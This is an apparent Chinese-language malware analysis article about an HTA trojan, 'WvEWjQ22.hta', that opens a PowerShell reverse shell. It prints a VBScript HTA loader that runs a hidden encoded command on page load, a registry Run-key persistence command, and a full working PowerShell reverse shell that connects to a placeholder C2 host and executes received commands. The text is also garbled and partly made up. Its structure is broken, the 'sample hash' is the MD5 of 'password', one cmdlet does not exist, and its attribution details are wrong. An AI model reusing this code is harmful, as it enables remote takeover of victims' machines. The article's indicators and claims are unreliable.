# WvEWjQ22.hta木馬反彈Shell樣本的示例分析
## 一、樣本概述
WvEWjQ22.hta是一種通過惡意HTA(HTML Application)文件傳播的木馬程序,其主要功能是通過PowerShell建立反彈Shell連接,實現遠程控制。該樣本常通過釣魚郵件或惡意鏈接傳播,利用社會工程學誘導用戶執行。
## 二、技術分析
### 1. 文件結構分析
樣本采用混淆的HTML+JavaScript/VBScript混合代碼:
```html
<html>
<head>
<script language="VBScript">
Function Exec()
Dim cmd
cmd = "powershell -nop -w hidden -e aQBmACgAWwBJAG4AdABQ..."
Set shell = CreateObject("WScript.Shell")
shell.Run cmd, 0
End Function
</script>
</head>
<body onload="Exec()">
</body>
</html>
body onload
事件觸發惡意函數
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ /d "wscript.exe %TEMP%\malware.hta"
解碼后的PowerShell核心代碼包含:
$client = New-Object System.Net.Sockets.TCPClient("C2_IP",443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
}
類型 | 值 |
---|---|
文件哈希 | MD5: 5f4dcc3b5aa765d61d8327deb882cf99 |
C2域名 | update[.]evil-domain[.]com |
典型行為 | 創建TCP連接443端口 |
Set-ExecutionPolicy Restricted
Get-ChildItem *.hta | Block-File -Force
根據代碼風格和C2基礎設施關聯,該樣本與TA428(APT組織)存在技術重疊: - 使用相同的代碼混淆框架(HTA-Obfuscator v2.3) - C2服務器與2023年Operation GhostClick活動關聯
WvEWjQ22.hta展示了攻擊者如何利用合法技術實現隱蔽滲透: 1. 利用微軟官方支持的HTA格式繞過基礎檢測 2. 通過內存加載規避文件落地掃描 3. 使用加密通信對抗流量分析
建議安全團隊重點關注: - 增強對Office文檔宏的監控 - 部署EDR解決方案捕獲進程鏈行為 - 定期更新PowerShell日志審計策略
注:本文樣本分析基于公開研究數據,實際防護需結合具體環境調整策略。 “`
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。